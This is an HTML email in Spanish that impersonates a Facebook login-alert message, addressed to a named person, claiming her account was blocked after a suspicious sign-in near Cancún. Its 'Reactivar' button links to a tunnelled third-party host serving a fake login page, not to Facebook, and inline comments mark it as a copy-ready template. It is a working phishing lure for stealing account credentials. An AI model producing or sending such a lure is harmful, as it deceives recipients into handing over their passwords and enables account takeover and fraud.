<!DOCTYPE html>
<html lang="es">
<head>
	<meta charset="utf-8">
	<title>Mensaje</title>
</head>
<body style="background-color: black ">


    
    
    

<!--Copia desde aquí-->
<table style="max-width: 600px; padding: 10px; margin:0 auto; border-collapse: collapse;">
	
    
    
<!--Imagen de Alerta de Inicio de sesión-->    
    <tr>
		<td style="background-color: #ecf0f1; text-align: left; padding: 0">
				<img width="93%" style="display:block; margin: 1.5% 3%" 
                     src="https://preview.ibb.co/nwYEWJ/1_alerta_de_inicio_de_sesion.png">
			
		</td>
	</tr>

	
	
    
    
<!--Mensaje--> 
    
	<tr>
		<td style="background-color: #ecf0f1">
			<div style="color: #34495e; margin: 4% 10% 2%; text-align: justify;font-family: sans-serif">
				<h2 style="color: #3c5a99; margin: 0 0 7px">Hola: Janny Bautista

,</h2>
				<p style="margin: 2px; font-size: 15px">
					Hemos detectado un intento de inicio de sesión en un dispositivo desconocido.<br>
					Nuevo inicio de sesion:</p>
				<ul style="font-size: 15px;  margin: 10px 0">
					<li>Sábado 09 de septiembre del 2022 a la(s) 09:00 p.m.</li>
					<li>Cerca de Cancún, México.</li>
					<li>Desde Google Chrome, Windows 10</li>
				</ul>
                
                
                
                
<!--Imagen del Mapa-->                
                
				<div style="width: 100%;margin:0px 0; display: inline-block;text-align: center">
					<img style="padding: 0; width: 150px; margin: 5px" src="https://imgbb.com/"><img src="https://i.ibb.co/3SMVNGk/mapa.png">
				</div> <br><br>
				<div style="width: 100%; text-align: center">
                    
                    
<!--URL de la ubicación-->
                    
					<a style="text-decoration: none; border-radius: 5px; padding: 11px 23px; color: white; background-color: #3c5a99" href="https://www.google.com/maps/@21.1581852,-86.8525185,15z">Ver mapa</a>	
				</div>
                <br>
                <p style="margin: 2px; font-size: 15px">
					Por su seguridad, el acceso a su cuenta ha sido bloqueado.<br><br>
                    Para desbloquear es necesario hacer el proceso de identificación 
                    de su cuenta, y así mismo reactivar el acceso a su cuenta de 
                    Facebook, le recordamos que puede ingresar de forma inmediata
                    desde el siguiente boton</p>
                <br>
                <div style="width: 100%; text-align: center">
                    
                    
<!--Link del Boton-->
                    
					<a style="text-decoration: none; border-radius: 5px; padding: 11px 23px; color: white; background-color: #3c5a99" href="https://q9qgk84pqo.loclx.io/login.html">Reactivar</a>	
				</div>
                
				<p style="color: #b3b3b3; font-size: 12px; text-align: center;margin: 30px 0 0">Facebook © 2022</p>
			</div>
		</td>
	</tr>
</table>
<!--hasta aquí-->

</body>
</html>
